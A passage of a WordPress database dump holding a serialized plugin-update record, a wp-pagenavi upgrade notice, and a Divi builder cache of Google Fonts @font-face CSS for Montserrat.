\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.7\";s:6:\"tested\";s:5:\"7.0.4\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:23:\"pagelayer/pagelayer.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:23:\"w.org/plugins/pagelayer\";s:4:\"slug\";s:9:\"pagelayer\";s:6:\"plugin\";s:23:\"pagelayer/pagelayer.php\";s:11:\"new_version\";s:5:\"2.1.8\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/pagelayer/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/pagelayer.2.1.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:62:\"https://ps.w.org/pagelayer/assets/icon-256x256.png?rev=2064937\";s:2:\"1x\";s:62:\"https://ps.w.org/pagelayer/assets/icon-128x128.png?rev=2064937\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/pagelayer/assets/banner-1544x500.png?rev=2668020\";s:2:\"1x\";s:64:\"https://ps.w.org/pagelayer/assets/banner-772x250.png?rev=2668020\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.7\";s:6:\"tested\";s:5:\"7.0.4\";s:12:\"requires_php\";s:3:\"5.5\";s:16:\"requires_plugins\";a:0:{}}s:31:\"popup-builder/popup-builder.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:27:\"w.org/plugins/popup-builder\";s:4:\"slug\";s:13:\"popup-builder\";s:6:\"plugin\";s:31:\"popup-builder/popup-builder.php\";s:11:\"new_version\";s:5:\"4.4.5\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/popup-builder/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/popup-builder.4.4.5.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/popup-builder/assets/icon-128x128.gif?rev=2698840\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/popup-builder/assets/banner-772x250.jpg?rev=2698842\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.2\";s:6:\"tested\";s:5:\"7.0.4\";s:12:\"requires_php\";s:5:\"5.3.3\";s:16:\"requires_plugins\";a:0:{}}s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:31:\"w.org/plugins/really-simple-ssl\";s:4:\"slug\";s:17:\"really-simple-ssl\";s:6:\"plugin\";s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";s:11:\"new_version\";s:5:\"9.7.0\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/really-simple-ssl/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/really-simple-ssl.9.7.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/really-simple-ssl/assets/icon-256x256.png?rev=2839720\";s:2:\"1x\";s:70:\"https://ps.w.org/really-simple-ssl/assets/icon-128x128.png?rev=2839720\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/really-simple-ssl/assets/banner-1544x500.png?rev=3100992\";s:2:\"1x\";s:72:\"https://ps.w.org/really-simple-ssl/assets/banner-772x250.png?rev=3100992\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.6\";s:6:\"tested\";s:3:\"7.1\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:47:\"regenerate-thumbnails/regenerate-thumbnails.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:35:\"w.org/plugins/regenerate-thumbnails\";s:4:\"slug\";s:21:\"regenerate-thumbnails\";s:6:\"plugin\";s:47:\"regenerate-thumbnails/regenerate-thumbnails.php\";s:11:\"new_version\";s:5:\"3.1.6\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/regenerate-thumbnails/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/regenerate-thumbnails.3.1.6.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:74:\"https://ps.w.org/regenerate-thumbnails/assets/icon-128x128.png?rev=1753390\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/regenerate-thumbnails/assets/banner-1544x500.jpg?rev=1753390\";s:2:\"1x\";s:76:\"https://ps.w.org/regenerate-thumbnails/assets/banner-772x250.jpg?rev=1753390\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.7\";s:6:\"tested\";s:5:\"6.8.8\";s:12:\"requires_php\";s:5:\"5.2.4\";s:16:\"requires_plugins\";a:0:{}}s:27:\"wp-pagenavi/wp-pagenavi.php\";O:8:\"stdClass\":14:{s:2:\"id\";s:25:\"w.org/plugins/wp-pagenavi\";s:4:\"slug\";s:11:\"wp-pagenavi\";s:6:\"plugin\";s:27:\"wp-pagenavi/wp-pagenavi.php\";s:11:\"new_version\";s:5:\"3.0.0\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/wp-pagenavi/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/wp-pagenavi.3.0.0.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:55:\"https://ps.w.org/wp-pagenavi/assets/icon.svg?rev=977997\";s:3:\"svg\";s:55:\"https://ps.w.org/wp-pagenavi/assets/icon.svg?rev=977997\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/wp-pagenavi/assets/banner-1544x500.png?rev=3639530\";s:2:\"1x\";s:66:\"https://ps.w.org/wp-pagenavi/assets/banner-772x250.png?rev=3639530\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.8\";s:6:\"tested\";s:5:\"7.0.4\";s:12:\"requires_php\";s:3:\"8.2\";s:16:\"requires_plugins\";a:0:{}s:14:\"upgrade_notice\";s:2121:\"<p>Requires WordPress 6.8 and PHP 8.2.</p>\n\n<p><strong>Settings migrate on activation, or on the first admin page load after updating.</strong> <code>pagenavi_options</code> becomes <code>wp_pagenavi_options</code>, and the old row is deleted once copied.</p>\n\n<p><strong>The settings screen is at <code>options-general.php?page=wp-pagenavi</code></strong>, still under <em>Settings -> PageNavi</em>.</p>\n\n<p><strong>If you copied <code>pagenavi-css.css</code> into your theme, rename your copy to <code>wp-pagenavi.css</code>.</strong> The plugin's stylesheet is now <code>css/wp-pagenavi.css</code> and the theme override is looked up under the new name; until you rename it your copy is ignored. Nothing inside it needs to change.</p>\n\n<p><strong>Nothing a theme calls has been renamed.</strong> <code>wp_pagenavi()</code>, <code>wp_pagenavi_dropdown()</code>, the <code>wp_pagenavi</code> filter and all ten <code>wp_pagenavi_class_*</code> filters behave as before.</p>\n\n<p><strong>Custom PHP reaching into the plugin's classes needs editing.</strong> Every class is prefixed <code>WP_</code>: <code>PageNavi_Options</code> is <code>WP_PageNavi_Options</code>, <code>PageNavi_Call</code> is <code>WP_PageNavi_Call</code>, <code>PageNavi_Core</code> is <code>WP_PageNavi_Core</code>. The settings screen was renamed as well as prefixed: <code>PageNavi_Admin</code> is now <code>WP_PageNavi_Settings</code>. <code>PageNavi_Options_Page</code> and <code>PageNavi_Core::$options</code> are gone — use <code>WP_PageNavi_Options::get()</code> and <code>WP_PageNavi_Options::get_defaults()</code>.</p>\n\n<p><strong>The bundled SCB framework is gone.</strong> It defined global functions and <code>scb*</code> classes that any plugin bundling it loaded for everything else to use. Code calling <code>html()</code>, <code>html_link()</code>, <code>set_post_field()</code>, <code>scb_init()</code> or any <code>scb_*</code> helper and relying on WP-PageNavi to provide them must now provide them itself. Another installed plugin may still be supplying them, in which case nothing breaks until that one stops.</p>\";}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:3:{s:9:\"hello.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/hello-dolly/assets/banner-1544x500.jpg?rev=2645582\";s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:45:\"tinymce-visualblocks/tinymce-visualblocks.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:34:\"w.org/plugins/tinymce-visualblocks\";s:4:\"slug\";s:20:\"tinymce-visualblocks\";s:6:\"plugin\";s:45:\"tinymce-visualblocks/tinymce-visualblocks.php\";s:11:\"new_version\";s:5:\"1.0.5\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/tinymce-visualblocks/\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/plugin/tinymce-visualblocks.1.0.5.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:71:\"https://s.w.org/plugins/geopattern-icon/tinymce-visualblocks_e8e4e4.svg\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:74:\"https://ps.w.org/tinymce-visualblocks/assets/banner-772x250.png?rev=991716\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.9\";}s:39:\"wp-file-manager/file_folder_manager.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:29:\"w.org/plugins/wp-file-manager\";s:4:\"slug\";s:15:\"wp-file-manager\";s:6:\"plugin\";s:39:\"wp-file-manager/file_folder_manager.php\";s:11:\"new_version\";s:5:\"8.0.4\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/wp-file-manager/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/wp-file-manager.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/wp-file-manager/assets/icon-128x128.png?rev=2491299\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/wp-file-manager/assets/banner-772x250.jpg?rev=2491299\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}}s:7:\"checked\";a:15:{s:19:\"akismet/akismet.php\";s:5:\"4.1.9\";s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";s:5:\"4.2.0\";s:33:\"alx-extensions/alx-extensions.php\";s:5:\"1.1.2\";s:25:\"duplicator/duplicator.php\";s:6:\"1.5.14\";s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:6:\"10.0.1\";s:9:\"hello.php\";s:5:\"1.7.2\";s:21:\"meta-box/meta-box.php\";s:6:\"5.3.10\";s:23:\"pagelayer/pagelayer.php\";s:5:\"1.4.8\";s:43:\"popularfx-templates/popularfx-templates.php\";s:5:\"1.1.7\";s:31:\"popup-builder/popup-builder.php\";s:5:\"4.0.4\";s:47:\"really-simple-ssl/rlrsssl-really-simple-ssl.php\";s:6:\"4.0.15\";s:47:\"regenerate-thumbnails/regenerate-thumbnails.php\";s:5:\"3.1.5\";s:45:\"tinymce-visualblocks/tinymce-visualblocks.php\";s:5:\"1.0.5\";s:27:\"wp-pagenavi/wp-pagenavi.php\";s:6:\"2.93.4\";s:39:\"wp-file-manager/file_folder_manager.php\";s:5:\"8.0.4\";}}','off'),(214844,'_transient_timeout__et_builder_gf_feature_cache','1787485805','off'),(214845,'_transient__et_builder_gf_feature_cache','1','off'); INSERT INTO `wpln_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (214846,'_et_builder_gf_feature_cache','a:2:{i:0;s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";i:1;a:5:{s:325:\"https://fonts.googleapis.com/css?family=Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic|Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic&subset=latin,latin-ext&display=swap_modern_ua\";a:1:{s:12:\"google-fonts\";s:154984:\"/* Original: https://fonts.googleapis.com/css?family=Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic|Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic&subset=latin,latin-ext&display=swap *//* User Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Mobile/15E148 Safari/604.1 *//* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: 